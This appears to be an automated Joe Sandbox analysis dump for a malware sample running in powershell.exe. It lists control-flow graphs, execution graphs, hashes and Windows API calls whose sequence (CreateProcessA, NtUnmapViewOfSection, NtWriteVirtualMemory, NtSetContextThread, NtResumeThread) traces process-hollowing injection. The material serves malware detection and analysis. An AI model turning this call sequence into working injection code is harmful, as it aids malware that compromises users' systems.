                          • Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
                          • Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                          • Instruction Fuzzy Hash:

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 212 40118e-40119b GetModuleHandleA 213 4011aa-4011ac 212->213 214 40119d-4011a9 GetProcAddress 212->214
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
                          • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000021.00000002.1714420529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_33_2_400000_powershell.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: RtlGetVersion$ntdll.dll
                          • API String ID: 1646373207-1489217083
                          • Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                          • Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
                          • Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                          • Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

                          Execution Graph

                          Execution Coverage:8.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:14.2%
                          Total number of Nodes:127
                          Total number of Limit Nodes:6
                          execution_graph 9691 7ffaac71e7cb 9692 7ffaac71e7cf K32GetModuleInformation 9691->9692 9694 7ffaac71e872 9692->9694 9544 7ffaac71eafa 9546 7ffaac71eb09 9544->9546 9545 7ffaac71eae8 9546->9545 9547 7ffaac71ec4b CreateFileMappingW 9546->9547 9548 7ffaac71ecb9 9547->9548 9549 7ffaac720c5d 9550 7ffaac720c6b NtWriteVirtualMemory 9549->9550 9552 7ffaac720d37 9550->9552 9695 7ffaac71e8ac 9696 7ffaac71e8b5 CreateFileA 9695->9696 9698 7ffaac71ea4c 9696->9698 9553 7ffaac720221 9554 7ffaac72022f CreateProcessA 9553->9554 9556 7ffaac720950 9554->9556 9557 7ffaac720f20 9558 7ffaac720f2f NtSetContextThread 9557->9558 9560 7ffaac720fba 9558->9560 9561 7ffaac720fe4 9562 7ffaac720fed NtResumeThread 9561->9562 9564 7ffaac7210a4 9562->9564 9565 7ffaac71ed66 9566 7ffaac71ed75 9565->9566 9567 7ffaac71ed58 9566->9567 9568 7ffaac71ee05 MapViewOfFile 9566->9568 9569 7ffaac71ee53 9568->9569 9570 7ffaac71fde9 9571 7ffaac71f6ba 9570->9571 9582 7ffaac71fc3f 9570->9582 9586 7ffaac71e078 9571->9586 9573 7ffaac71f73a 9573->9582 9590 7ffaac71e088 9573->9590 9575 7ffaac71f77b 9576 7ffaac71e088 NtUnmapViewOfSection 9575->9576 9575->9582 9577 7ffaac71f7ca 9576->9577 9577->9582 9594 7ffaac71e098 9577->9594 9579 7ffaac71f804 9579->9582 9598 7ffaac71e0a8 9579->9598 9581 7ffaac71f8f4 9581->9582 9602 7ffaac71e108 9581->9602 9584 7ffaac71fc2b 9584->9582 9608 7ffaac71e118 9584->9608 9587 7ffaac71e081 NtUnmapViewOfSection 9586->9587 9589 7ffaac720b0a 9587->9589 9589->9573 9591 7ffaac71e091 NtUnmapViewOfSection 9590->9591 9593 7ffaac720b0a 9591->9593 9593->9575 9595 7ffaac71e0a1 NtUnmapViewOfSection 9594->9595 9597 7ffaac720b0a 9595->9597 9597->9579 9599 7ffaac71e0af NtUnmapViewOfSection 9598->9599 9601 7ffaac720b0a 9599->9601 9601->9581 9603 7ffaac71e111 9602->9603 9607 7ffaac71e1aa 9603->9607 9614 7ffaac71dd58 9603->9614 9606 7ffaac71dd58 10 API calls 9606->9607 9607->9584 9609 7ffaac71e121 9608->9609 9610 7ffaac71dd58 10 API calls 9609->9610 9613 7ffaac71e1aa 9609->9613 9611 7ffaac71e18c 9610->9611 9612 7ffaac71dd58 10 API calls 9611->9612 9612->9613 9613->9582 9615 7ffaac71e350 9614->9615 9641 7ffaac71df28 9615->9641 9617 7ffaac71e38a 9618 7ffaac71e18c 9617->9618 9646 7ffaac71df38 9617->9646 9618->9606 9620 7ffaac71e39b 9651 7ffaac71df48 9620->9651 9622 7ffaac71e3b0 9623 7ffaac71e582 9622->9623 9656 7ffaac71df58 9622->9656 9686 7ffaac71dfb8 9623->9686 9625 7ffaac71e58a 9625->9618 9627 7ffaac71e3f6 9627->9623 9661 7ffaac71df68 9627->9661 9629 7ffaac71e423 9630 7ffaac71e57a 9629->9630 9666 7ffaac71df78 9629->9666 9632 7ffaac71dfa8 NtUnmapViewOfSection 9630->9632 9632->9623 9633 7ffaac71e512 9681 7ffaac71dfa8 9633->9681 9635 7ffaac71e449 9635->9633 9671 7ffaac71df88 9635->9671 9637 7ffaac71e54e 9676 7ffaac71df98 9637->9676 9639 7ffaac71e55f 9640 7ffaac71df88 NtUnmapViewOfSection 9639->9640 9640->9633 9643 7ffaac71df31 9641->9643 9642 7ffaac71e04b 9642->9617 9643->9642 9644 7ffaac720ad0 NtUnmapViewOfSection 9643->9644 9645 7ffaac720b0a 9644->9645 9645->9617 9647 7ffaac71df41 9646->9647 9648 7ffaac71e04b 9647->9648 9649 7ffaac720ad0 NtUnmapViewOfSection 9647->9649 9648->9620 9650 7ffaac720b0a 9649->9650 9650->9620 9652 7ffaac71df51 9651->9652 9653 7ffaac71e04b 9652->9653 9654 7ffaac720ad0 NtUnmapViewOfSection 9652->9654 9653->9622 9655 7ffaac720b0a 9654->9655 9655->9622 9657 7ffaac71df5e 9656->9657 9658 7ffaac71e04b 9657->9658 9659 7ffaac720ad0 NtUnmapViewOfSection 9657->9659 9658->9627 9660 7ffaac720b0a 9659->9660 9660->9627 9662 7ffaac71df71 9661->9662 9663 7ffaac71e04b 9662->9663 9664 7ffaac720ad0 NtUnmapViewOfSection 9662->9664 9663->9629 9665 7ffaac720b0a 9664->9665 9665->9629 9668 7ffaac71df81 9666->9668 9667 7ffaac71e04b 9667->9635 9668->9667 9669 7ffaac720ad0 NtUnmapViewOfSection 9668->9669 9670 7ffaac720b0a 9669->9670 9670->9635 9672 7ffaac71df91 9671->9672 9673 7ffaac71e04b 9672->9673 9674 7ffaac720ad0 NtUnmapViewOfSection 9672->9674 9673->9637 9675 7ffaac720b0a 9674->9675 9675->9637 9678 7ffaac71dfa1 9676->9678 9677 7ffaac71e04b 9677->9639 9678->9677 9679 7ffaac720ad0 NtUnmapViewOfSection 9678->9679 9680 7ffaac720b0a 9679->9680 9680->9639 9683 7ffaac71dfb1 9681->9683 9682 7ffaac71e04b 9682->9630 9683->9682 9684 7ffaac720ad0 NtUnmapViewOfSection 9683->9684 9685 7ffaac720b0a 9684->9685 9685->9630 9688 7ffaac71dfc1 9686->9688 9687 7ffaac71e04b 9687->9625 9688->9687 9689 7ffaac720ad0 NtUnmapViewOfSection 9688->9689 9690 7ffaac720b0a 9689->9690 9690->9625

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 562 7ffaac71df98-7ffaac71e049 577 7ffaac71e04b-7ffaac71e069 562->577 578 7ffaac71e0af-7ffaac720b08 NtUnmapViewOfSection 562->578 584 7ffaac720b0a 578->584 585 7ffaac720b10-7ffaac720b2c 578->585 584->585
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4ac92a436164e8f4a12dde870803062a9e1fafc5a6d052b7e6f5fa0406365ea
                          • Instruction ID: 0346e920cd35ce0019b6a2f148e9e5de3db3cc44f808549fa9a5162ecdb6d58a
                          • Opcode Fuzzy Hash: d4ac92a436164e8f4a12dde870803062a9e1fafc5a6d052b7e6f5fa0406365ea
                          • Instruction Fuzzy Hash: F751E77290E7858FFB16D768985A6E97FB0EF53210F0840BBC09DCB1A3E918D80987D1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 598 7ffaac720a3e-7ffaac720a4b 599 7ffaac720a4d-7ffaac720a55 598->599 600 7ffaac720a56-7ffaac720a7a 598->600 599->600 601 7ffaac720a7c-7ffaac720b08 NtUnmapViewOfSection 600->601 602 7ffaac720a28-7ffaac720a3a 600->602 607 7ffaac720b0a 601->607 608 7ffaac720b10-7ffaac720b2c 601->608 607->608
                          APIs
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID: SectionUnmapView
                          • String ID:
                          • API String ID: 498011366-0
                          • Opcode ID: 81b95588e2b2c4a3aa7fe87a2d7b858d1301a799458445bd084ed2ed377941eb
                          • Instruction ID: c4346ae60bdb48e74be10266de1ede798b8b28816a53b621e2ff1df2e5da89fb
                          • Opcode Fuzzy Hash: 81b95588e2b2c4a3aa7fe87a2d7b858d1301a799458445bd084ed2ed377941eb
                          • Instruction Fuzzy Hash: 7E41453190D7888FEB19DB68D8467E97FF0EF57320F0442ABD049C71A3E665A446CB92

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 609 7ffaac720c5d-7ffaac720c69 610 7ffaac720c6b-7ffaac720c73 609->610 611 7ffaac720c74-7ffaac720ce8 609->611 610->611 615 7ffaac720cea-7ffaac720cef 611->615 616 7ffaac720cf2-7ffaac720d35 NtWriteVirtualMemory 611->616 615->616 617 7ffaac720d3d-7ffaac720d5a 616->617 618 7ffaac720d37 616->618 618->617
                          APIs
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          • Opcode ID: 97da6507a6e1571d9977542a1892bfd6f6df9fae5d72885ce8eae3ccbb5a7b94
                          • Instruction ID: 265e2a555ff316b7b5ab757430e62e998ba54d0e4af17cff53a33642c584b084
                          • Opcode Fuzzy Hash: 97da6507a6e1571d9977542a1892bfd6f6df9fae5d72885ce8eae3ccbb5a7b94
                          • Instruction Fuzzy Hash: 5B31E27190CB488FDB18DF58D885AF9BBF0FB5A321F04426ED04AD3652DB70A846CB81

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 619 7ffaac71e078-7ffaac720b08 NtUnmapViewOfSection 630 7ffaac720b0a 619->630 631 7ffaac720b10-7ffaac720b2c 619->631 630->631
                          APIs
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID: SectionUnmapView
                          • String ID:
                          • API String ID: 498011366-0
                          • Opcode ID: 0696db72fcd863708bcd1b35c06cbeac016082793899b1aa47b71b1ebdfb7862
                          • Instruction ID: 7e21141a0ba2a6cca5d9522d72d88b67d981a4ad807f8093a0b6fea669bb90ab
                          • Opcode Fuzzy Hash: 0696db72fcd863708bcd1b35c06cbeac016082793899b1aa47b71b1ebdfb7862
                          • Instruction Fuzzy Hash: A531377190D7488FEB58CB58980A7F9BBF0EB56310F04416FD04ED7166EA34E849C791
                          APIs
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: ff28a0e0d853c751d65e0a772db21b8954083a2742bd6fa0352bf4ad0bea5fc5
                          • Instruction ID: 4ee922f333e52836a335a78d39b67da4ee887332c95873811ce154174f4d3384
                          • Opcode Fuzzy Hash: ff28a0e0d853c751d65e0a772db21b8954083a2742bd6fa0352bf4ad0bea5fc5
                          • Instruction Fuzzy Hash: 5031D37190C64C8FDB58DF98D845BEABBF1EF56311F04416BD009D3692DB70A846CB91
                          APIs
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID: ContextThread
                          • String ID:
                          • API String ID: 1591575202-0
                          • Opcode ID: 6b2430c99427e90a71f5e3f6fe8b072a7f4c679f2fe57a8cc61fe4faee1c59e2
                          • Instruction ID: 791a189943eca45bf29e06257fe859ce274d38b88a1bbc2bbc3db37c5c88a1d5
                          • Opcode Fuzzy Hash: 6b2430c99427e90a71f5e3f6fe8b072a7f4c679f2fe57a8cc61fe4faee1c59e2
                          • Instruction Fuzzy Hash: F421B17090CA4C8FDB58DF58D8467E9BBF0EB66321F04416FD04DC3652D674A846CB91
                          Memory Dump Source
                          • Source File: 00000022.00000002.1806474232.00007FFAAC990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC990000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac990000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d75fb0e3fcc897aa5c798d5ef63c07310698cacd9d4e37baa2eeb117f7760264
                          • Instruction ID: e564006fccbb2e21721dd80877179c1a15ca3e67fb22c77fbc843d7b3afcc906
                          • Opcode Fuzzy Hash: d75fb0e3fcc897aa5c798d5ef63c07310698cacd9d4e37baa2eeb117f7760264
                          • Instruction Fuzzy Hash: BF722566A0EB898FF7A6976848556B57BE0EF97210B0841FBD04DC71A3ED1DEC09C381

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 467 7ffaac720221-7ffaac72022d 468 7ffaac72022f-7ffaac720237 467->468 469 7ffaac720238-7ffaac720249 467->469 468->469 470 7ffaac72024b-7ffaac72028c 469->470 471 7ffaac72028d-7ffaac7206f2 469->471 470->471 481 7ffaac720750-7ffaac720782 471->481 482 7ffaac7206f4-7ffaac720703 471->482 487 7ffaac7207e0-7ffaac720831 481->487 488 7ffaac720784-7ffaac720793 481->488 482->481 483 7ffaac720705-7ffaac720708 482->483 485 7ffaac72070a-7ffaac72071d 483->485 486 7ffaac720742-7ffaac72074a 483->486 489 7ffaac72071f 485->489 490 7ffaac720721-7ffaac720734 485->490 486->481 498 7ffaac72088f-7ffaac7208c0 487->498 499 7ffaac720833-7ffaac720842 487->499 488->487 491 7ffaac720795-7ffaac720798 488->491 489->490 490->490 492 7ffaac720736-7ffaac72073e 490->492 493 7ffaac72079a-7ffaac7207ad 491->493 494 7ffaac7207d2-7ffaac7207da 491->494 492->486 496 7ffaac7207af 493->496 497 7ffaac7207b1-7ffaac7207c4 493->497 494->487 496->497 497->497 500 7ffaac7207c6-7ffaac7207ce 497->500 507 7ffaac7208ce-7ffaac72094e CreateProcessA 498->507 508 7ffaac7208c2-7ffaac7208ca 498->508 499->498 501 7ffaac720844-7ffaac720847 499->501 500->494 502 7ffaac720881-7ffaac720889 501->502 503 7ffaac720849-7ffaac72085c 501->503 502->498 505 7ffaac72085e 503->505 506 7ffaac720860-7ffaac720873 503->506 505->506 506->506 509 7ffaac720875-7ffaac72087d 506->509 510 7ffaac720950 507->510 511 7ffaac720956-7ffaac720993 call 7ffaac7209af 507->511 508->507 509->502 510->511 514 7ffaac72099a-7ffaac7209ae 511->514 515 7ffaac720995 511->515 515->514
                          APIs
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: e407db53c9b9478ea91897804eee232b053cc8031d729639f497c4951e0b57cf
                          • Instruction ID: 1526a4642fa35e58147ba2e9271264902515f8f04688355a28c3a1dac314f447
                          • Opcode Fuzzy Hash: e407db53c9b9478ea91897804eee232b053cc8031d729639f497c4951e0b57cf
                          • Instruction Fuzzy Hash: EED10630518B898FEB64DF2CD8467F57BE0FF56311F14826AD88DC7292EA3494458BD2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 516 7ffaac71eafa-7ffaac71eb07 517 7ffaac71eb12-7ffaac71eb3a 516->517 518 7ffaac71eb09-7ffaac71eb11 516->518 519 7ffaac71eb3c-7ffaac71ebdf 517->519 520 7ffaac71eae8-7ffaac71eaf4 517->520 518->517 524 7ffaac71ec3a-7ffaac71ecb7 CreateFileMappingW 519->524 525 7ffaac71ebe1-7ffaac71ebf0 519->525 532 7ffaac71ecbf-7ffaac71ecfb call 7ffaac71ed17 524->532 533 7ffaac71ecb9 524->533 525->524 526 7ffaac71ebf2-7ffaac71ebf5 525->526 527 7ffaac71ec2f-7ffaac71ec37 526->527 528 7ffaac71ebf7-7ffaac71ec0a 526->528 527->524 530 7ffaac71ec0c 528->530 531 7ffaac71ec0e-7ffaac71ec21 528->531 530->531 531->531 534 7ffaac71ec23-7ffaac71ec2b 531->534 538 7ffaac71ecfd 532->538 539 7ffaac71ed02-7ffaac71ed16 532->539 533->532 534->527 538->539
                          APIs
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID: CreateFileMapping
                          • String ID:
                          • API String ID: 524692379-0
                          • Opcode ID: 09f1eb218ab504d005c2aa1a669f923198eb8ef1a0afd2d254c3dd7f90aa5884
                          • Instruction ID: 91a3bd265b80933149b1781534679d88a2f84581355f066e1d68273472d3a741
                          • Opcode Fuzzy Hash: 09f1eb218ab504d005c2aa1a669f923198eb8ef1a0afd2d254c3dd7f90aa5884
                          • Instruction Fuzzy Hash: 7D71063051CB8D8FEB59DF28D8467E47BE1FB56310F14426AE88DC32A2DA75E8458B81

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 540 7ffaac71e8ac-7ffaac71e8b3 541 7ffaac71e8be-7ffaac71e957 540->541 542 7ffaac71e8b5-7ffaac71e8bd 540->542 546 7ffaac71e9b2-7ffaac71ea4a CreateFileA 541->546 547 7ffaac71e959-7ffaac71e968 541->547 542->541 554 7ffaac71ea4c 546->554 555 7ffaac71ea52-7ffaac71ea8e call 7ffaac71eaaa 546->555 547->546 548 7ffaac71e96a-7ffaac71e96d 547->548 549 7ffaac71e96f-7ffaac71e982 548->549 550 7ffaac71e9a7-7ffaac71e9af 548->550 552 7ffaac71e984 549->552 553 7ffaac71e986-7ffaac71e999 549->553 550->546 552->553 553->553 556 7ffaac71e99b-7ffaac71e9a3 553->556 554->555 560 7ffaac71ea90 555->560 561 7ffaac71ea95-7ffaac71eaa9 555->561 556->550 560->561
                          APIs
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: ec07281f9a09426762e7fb92d862ee00289e5243a9ed38913fbb23105a719330
                          • Instruction ID: 8e2b1bed2ca4a4e7013e670a16dbd62f1eb56204a8cd2bf281e46f131534d928
                          • Opcode Fuzzy Hash: ec07281f9a09426762e7fb92d862ee00289e5243a9ed38913fbb23105a719330
                          • Instruction Fuzzy Hash: B761EA30518B4D8FEB58EF28D8467E477E1FB59310F10426AE85DC7292DA74E8458BC2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 586 7ffaac71ed66-7ffaac71ed73 587 7ffaac71ed7e-7ffaac71ed8f 586->587 588 7ffaac71ed75-7ffaac71ed7d 586->588 589 7ffaac71ed9a-7ffaac71edaa 587->589 590 7ffaac71ed91-7ffaac71ed99 587->590 588->587 591 7ffaac71edac-7ffaac71ee51 MapViewOfFile 589->591 592 7ffaac71ed58-7ffaac71ed61 589->592 590->589 596 7ffaac71ee53 591->596 597 7ffaac71ee59-7ffaac71ee76 591->597 596->597
                          APIs
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID: FileView
                          • String ID:
                          • API String ID: 3314676101-0
                          • Opcode ID: 83c05f1d66686a864baf23dc1e5490b9805bb32cc202c35575af1cdf7a9c2710
                          • Instruction ID: 9a2cb2881fca295363e435160dc76be419ac51e16f3559b19b0e9bf5449d7898
                          • Opcode Fuzzy Hash: 83c05f1d66686a864baf23dc1e5490b9805bb32cc202c35575af1cdf7a9c2710
                          • Instruction Fuzzy Hash: 6741173190CB889FEB0DDB68D8066F9BBF0FF56321F14426ED099C31A2DA65B446C791
                          APIs
                          Memory Dump Source
                          • Source File: 00000022.00000002.1799216017.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac710000_powershell.jbxd
                          Similarity
                          • API ID: InformationModule
                          • String ID:
                          • API String ID: 3425974696-0
                          • Opcode ID: 4dd8f04d0077a926c6fd3f501cb00c65326c099122e8a4bd3c41c05cd33be24b
                          • Instruction ID: 802bc4ab85cbb005519aec88bf0d8e8d43382bff7b581e9fc390e2c289fac81d
                          • Opcode Fuzzy Hash: 4dd8f04d0077a926c6fd3f501cb00c65326c099122e8a4bd3c41c05cd33be24b
                          • Instruction Fuzzy Hash: FA31B37191CA1C9FDB18DB9CD8496F9BBE1EBA9322F00423FD049D3651DB70A8568B81
                          Memory Dump Source
                          • Source File: 00000022.00000002.1800930233.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac7e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 563668fb975340751776133a3de7469730f36aa684117b48d0c237b7165c4db0
                          • Instruction ID: abdf20d348b9089f3be6b55d5dad38e2d33af706e828ad0c02774862b0a24d22
                          • Opcode Fuzzy Hash: 563668fb975340751776133a3de7469730f36aa684117b48d0c237b7165c4db0
                          • Instruction Fuzzy Hash: 0621F587D0FBDA8FF395A72858592A85BD0EF96260B6841FAD48DC71C3DE189C0D4391
                          Memory Dump Source
                          • Source File: 00000022.00000002.1806474232.00007FFAAC990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC990000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac990000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 76cfb94e3a1166ae65ab292385bb804962b0dfd2502289240d91385e4b853324
                          • Instruction ID: e07dc9c384c9202b7bed84d3fee4b46fa046ea15593a9914d7b6e96e27ceccb7
                          • Opcode Fuzzy Hash: 76cfb94e3a1166ae65ab292385bb804962b0dfd2502289240d91385e4b853324
                          • Instruction Fuzzy Hash: 6BF09617F1EA298AF7B5926C64563F853C2DF99220B5986B3D50DC31F5DC0EEC4902C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000022.00000002.1800930233.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac7e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: P7?S$x6?S$x6?S$x6?S
                          • API String ID: 0-2035566449
                          • Opcode ID: 090ae2ed86e64811c747b2794053428fa5bfc6b8eaa4d545316553f57f39ba30
                          • Instruction ID: dfefe0f3f8201ca7889f9e774da4767619a326cb3d6e4ff8b87eb3e97da5661b
                          • Opcode Fuzzy Hash: 090ae2ed86e64811c747b2794053428fa5bfc6b8eaa4d545316553f57f39ba30
                          • Instruction Fuzzy Hash: D2414E3131CA448FDF99EA18D455EA573E1EBA9314F14445DD08ACB2A2CE22EC45CB81
                          Strings
                          Memory Dump Source
                          • Source File: 00000022.00000002.1800930233.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_34_2_7ffaac7e0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: P7?S$x6?S$x6?S$x6?S
                          • API String ID: 0-2035566449
                          • Opcode ID: 090ae2ed86e64811c747b2794053428fa5bfc6b8eaa4d545316553f57f39ba30
                          • Instruction ID: c1f8faa4fc3298cfe9dceb2f045da704fc92805df85e1c8a1df8d69dc83cfd01
                          • Opcode Fuzzy Hash: 090ae2ed86e64811c747b2794053428fa5bfc6b8eaa4d545316553f57f39ba30
                          • Instruction Fuzzy Hash: 22413F3131CE448FDF99EA18D455EA577E1EFA9314F14445DD08ACB2A2DE32EC45CB82

                          Execution Graph

                          Execution Coverage:2.7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:6.4%
                          Total number of Nodes:1885
                          Total number of Limit Nodes:28
                          execution_graph 15749 279a9272c80 TlsGetValue TlsGetValue TlsGetValue 15750 279a9272cd9 15749->15750 15754 279a9272d51 15749->15754 15753 279a9272ce1 15750->15753 15750->15754 15751 279a9272d4c 15752 279a9272e06 TlsSetValue TlsSetValue TlsSetValue 15752->15751 15753->15751 15753->15752 15757 279a9273f88 15753->15757 15754->15751 15754->15752 15756 279a9273f88 StrCmpNIW 15754->15756 15756->15754 15758 279a9273faa 15757->15758 15759 279a9273f95 StrCmpNIW 15757->15759 15758->15753 15759->15758 15799 279a928387c 15800 279a92838b4 __GSHandlerCheckCommon 15799->15800 15801 279a92838e0 15800->15801 15803 279a9279a24 15800->15803 15810 279a9279324 15803->15810 15805 279a9279a4e 15806 279a9279324 _CallSETranslator 9 API calls 15805->15806 15807 279a9279a5b 15806->15807 15808 279a9279324 _CallSETranslator 9 API calls 15807->15808 15809 279a9279a64 15808->15809 15809->15801 15813 279a9279340 15810->15813 15812 279a927932d 15812->15805 15814 279a927935f GetLastError 15813->15814 15815 279a9279358 15813->15815 15825 279a9279c8c 15814->15825 15815->15812 15829 279a9279aac 15825->15829 15830 279a9279b96 TlsGetValue 15829->15830 15836 279a9279af0 __vcrt_FlsAlloc 15829->15836 15831 279a9279b1e LoadLibraryExW 15833 279a9279b3f GetLastError 15831->15833 15834 279a9279bbd 15831->15834 15832 279a9279bdd GetProcAddress 15832->15830 15833->15836 15834->15832 15835 279a9279bd4 FreeLibrary 15834->15835 15835->15832 15836->15830 15836->15831 15836->15832 15837 279a9279b61 LoadLibraryExW 15836->15837 15837->15834 15837->15836 18449 279a927c180 18452 279a927bf38 18449->18452 18459 279a927bf00 18452->18459 18457 279a927bebc 13 API calls 18458 279a927bf6b 18457->18458 18460 279a927bf15 18459->18460 18461 279a927bf10 18459->18461 18463 279a927bf1c 18460->18463 18462 279a927bebc 13 API calls 18461->18462 18462->18460 18464 279a927bf31 18463->18464 18465 279a927bf2c 18463->18465 18464->18457 18466 279a927bebc 13 API calls 18465->18466 18466->18464 15849 279a9275c8d 15851 279a9275c94 15849->15851 15850 279a9275cfb 15851->15850 15852 279a9275d77 VirtualProtect 15851->15852 15853 279a9275da3 GetLastError 15852->15853 15854 279a9275db1 15852->15854 15853->15854 17056 279a9281398 17057 279a92813ae 17056->17057 17058 279a92813f5 17057->17058 17059 279a928140e 17057->17059 17060 279a927d1f4 __std_exception_copy 13 API calls 17058->17060 17062 279a927dd78 14 API calls 17059->17062 17064 279a9281405 17059->17064 17061 279a92813fa 17060->17061 17063 279a927d04c _invalid_parameter_noinfo 38 API calls 17061->17063 17062->17064 17063->17064 17065 279a9277f60 17066 279a9277f7c 17065->17066 17067 279a9277f81 17065->17067 17069 279a9278090 17066->17069 17070 279a9278127 17069->17070 17071 279a92780b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17069->17071 17070->17067 17071->17070 15861 279a928485e 15862 279a9279324 _CallSETranslator 9 API calls 15861->15862 15863 279a928486c 15862->15863 15864 279a9284877 15863->15864 15865 279a9279324 _CallSETranslator 9 API calls 15863->15865 15865->15864 17769 279a928465f 17770 279a9284677 17769->17770 17776 279a92846e2 17769->17776 17771 279a9279324 _CallSETranslator 9 API calls 17770->17771 17770->17776 